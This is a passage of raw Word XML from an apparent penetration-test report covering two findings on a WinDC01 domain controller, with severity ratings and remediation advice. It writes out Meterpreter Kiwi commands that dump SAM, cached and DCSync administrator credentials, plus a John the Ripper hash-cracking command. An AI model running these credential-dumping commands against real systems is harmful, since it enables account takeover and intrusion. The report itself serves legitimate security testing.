              <w:t xml:space="preserve">meterpreter&gt; load kiwi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### Loads Kiwi </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterperter&gt; lsa_dump_sam</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### Dumps Creds</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000360">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">running:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000361">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter&gt; load Kiwi </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000362">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### Loads Kiwi </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000363">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter&gt; kiwi_cmd lsadump::cache</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000364">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### Dumps Cached Passwords </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000365">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000366">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000367">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000368">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">All creds can converted to plain text by simply putting them in a text file and running:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000369">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">john –format-NT pass.txt –format-NT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036A">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B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="2990850" cy="238125"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="47"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299085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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1828800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="3"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46577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="4343400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="16"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="4978400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="5"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4657725"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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4664787" cy="1423988"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="21"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4664787"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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1460500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="45"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1422400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="7"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465772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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4704615" cy="1433513"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="44"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4704615"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74">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20:110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000376">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77">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch SLMail Exploit </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000378">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000379">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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7B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 25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7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7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7E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Gaining Access to WINDC01 Server using Dumped Credentials </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037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0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS / Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000381">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2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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8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4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Using dumped credentials from previous exploits access was gained to the WinDC01 Server. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000385">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86">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="1727200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="46"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4657725" cy="1727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88">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9">
            <w:pPr>
              <w:widowControl w:val="0"/>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38A">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8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Change passwords to secure passwords, use 2fa authentication. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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8E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 26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8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9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91">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Traversal of WinDC01 Server to Dump More Credentials </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS / Windows OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000394">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5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="980000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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96">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Loading Kiwi while in a shell with the WinDC01 server it was possible to dump Administrator Credentials. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000398">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000399">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">running:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter&gt; load kiwi </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### loads Kiwi </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter&gt; dcsync_ntlm administrator</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#### dumps administrator credentials </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000039F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A1">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A2">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3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="838200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="31"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46577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widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="698500"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="48"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4657725" cy="6985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A6">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7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A8">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A9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Patch Previous exploits that allowed for a shell to be opened. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AA">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AB">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AD">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AE">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AF">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B0">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B3">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
